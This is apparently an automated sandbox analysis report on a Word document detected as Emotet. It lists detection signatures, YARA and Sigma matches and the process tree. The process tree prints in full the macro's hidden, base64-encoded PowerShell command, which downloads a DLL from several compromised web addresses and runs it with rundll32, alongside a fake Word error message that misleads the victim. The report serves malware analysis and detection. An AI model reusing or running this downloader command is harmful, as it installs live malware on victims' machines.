Loading ...

Play interactive tourEdit tour

Analysis Report Informacion_29.doc

Overview

General Information

Sample Name:Informacion_29.doc
Analysis ID:336937
MD5:6c1cb4c06ead6f5ce29a931fa12410fa
SHA1:4ac228fa54e73993dcccb69389a97cfcf67228b5
SHA256:43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6804 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cmd.exe (PID: 7000 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msg.exe (PID: 7044 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)
    • powershell.exe (PID: 7064 cmdline: POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA MD5: 95000560239032BC68B4C2FDFCDEF913)
      • rundll32.exe (PID: 204 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL MD5: 73C519F050C20580F8A62C849D49215A)
        • rundll32.exe (PID: 4456 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 5692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6520 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 784 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4648 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5552 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4560 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 912 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7072 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.289454945.0000018A154BB000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x2f9c:$s1: POwersheLL
  • 0x595c:$s1: POwersheLL
  • 0x9432:$s1: POwersheLL
0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000004.00000003.278200486.0000018A2C3D3000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x340:$s1: POwersheLL
    00000004.00000002.280486298.0000018A13D20000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x1ac0:$s1: POwersheLL
    00000004.00000002.290625263.0000018A2C1D0000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x2ba:$s1: POwersheLL
    Click to see the 10 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    14.2.rundll32.exe.3410000.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
      14.2.rundll32.exe.3410000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
        13.2.rundll32.exe.29e0000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          13.2.rundll32.exe.29e0000.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            13.2.rundll32.exe.41b0000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 1 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
              Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF